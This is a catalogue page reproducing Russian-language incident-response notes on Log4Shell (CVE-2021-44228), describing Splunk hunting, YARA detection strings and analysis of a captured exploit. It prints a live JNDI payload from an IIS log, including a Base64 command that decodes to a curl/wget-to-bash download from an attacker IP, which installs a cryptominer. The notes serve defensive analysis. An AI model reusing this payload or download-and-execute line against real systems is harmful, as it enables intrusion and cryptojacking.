Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-44228-DFIR-Notes — CVE-2021-44228 DFIR заметки | Kitploit
Инструменты/GitHubGitHub/azeemering/cve-2021-44228-dfir-notes
Анализ уязвимостейАнализ вредоносных программЦифровая криминалистикаРазведка угрозОбучение и ОбразованиеРеагирование на ИнцидентыАнализ Журналов
GitHubazeemering/cve-2021-44228-dfir-notes

CVE-2021-44228-DFIR-Notes

CVE-2021-44228 DFIR заметки

Репозиторий
7224 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-44228 Заметки по DFIR

По пути домой я начал получать первые сообщения об уязвимости #log4shell.

Уязвимость высокой степени серьезности (CVE-2021-44228), затрагивающая несколько версий утилиты Apache Log4j 2, была публично раскрыта через GitHub проекта 9 декабря 2021 года. Эта уязвимость, обнаруженная Чэнь Чжаоцзюнем из команды безопасности Alibaba Cloud, затрагивает Apache Log4j 2 версий с 2.0 по 2.14.1.

Сразу взялся за дело, когда вернулся домой. Splunk4tw как обычно.

После публикации первого proof-of-concept эксплойта на GitHub, злоумышленники начали сканировать интернет в поисках систем, уязвимых для этой удаленно эксплуатируемой уязвимости, не требующей аутентификации. Ниже вы увидите часть этих попыток сканирования и эксплуатации.

Первым делом я проверяю, не опубликовал ли кто-то первоначальное YARA-правило. Нашел его здесь https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b (спасибо Флориану Роту)

В нем упоминаются следующие строки для обнаружения: strings: $x1 = "${jndi:ldap:/" $x2 = "${jndi:rmi:/" $x3 = "${jndi:ldaps:/" $x4 = "${jndi:dns:/"

Я не боюсь... давайте загрузим процессоры и сразу перейдем к делу с самым тяжелым Splunk-запросом.

index=* jndi:ldap* (updated query with index=* "{lower:l}${lower:d}a${lower:p}")

У меня есть срабатывания как в логах IIS, так и в журналах событий Windows (отредактировано), а также множество заблокированных попыток в логах брандмауэра...

IIS: image

WINEVENTLOG: image

Проверяю IP-адрес 45.155.205.233... Санкт-Петербург, Россия... какой сюрприз. image

Найденная строка выглядит как классическая обфусцированная закодированная вредоносная строка. Давайте посмотрим, что она делает:

Давайте декодируем Base64 строку с помощью cyberchef 2021-12-10 13:26:16 [redacted] GET / - 443 - xxx.xx.xxx.xx ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNDUuMzUuMTk1LjYzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE0NS4zNS4xOTUuNjM6ODApfGJhc2g=} http://[redacted]:80/ 200 0 0 171

image

(curl -s 45.155.xx.233:xxxx/145.xx.195.63:80||wget -q -O- 45.xx.205.233:xxxx/145.xx.xxx.63:80)|bash

Curl... запустить shell-скрипт, bash... OMG. Начинаю догадываться, что будет делать эта мерзость....

Давайте выполним curl команду в песочнице:

image

368 строк кода. (запустите здесь, если хотите посмотреть весь скрипт --> https://reqbin.com/c-ipejxywd

Некоторые фрагменты:

image image image

И после завершения он даже очищает файлы логов... какой сюрприз:

image

По сути, он пытается установить вредоносное ПО под названием Kingsin, которое является криптомайнером. Цели — nix-системы. Убедитесь, что вы обновили свои системы, так как эксплойт, вероятно, будет использоваться для запуска самых разных полезных нагрузок.

Спасибо моим коллегам Мартейну из Umbrio и Робу [отредактировано] за пятничный вечер спарринга в WhatsApp по этому поводу. 00:09 пора спать.

#ОБНОВЛЕНИЯ и полезные ресурсы#

  • https://www.splunk.com/en_us/blog/security/log-jammin-log4j-2-rce.html
  • https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
  • https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228

image

Скачать инструмент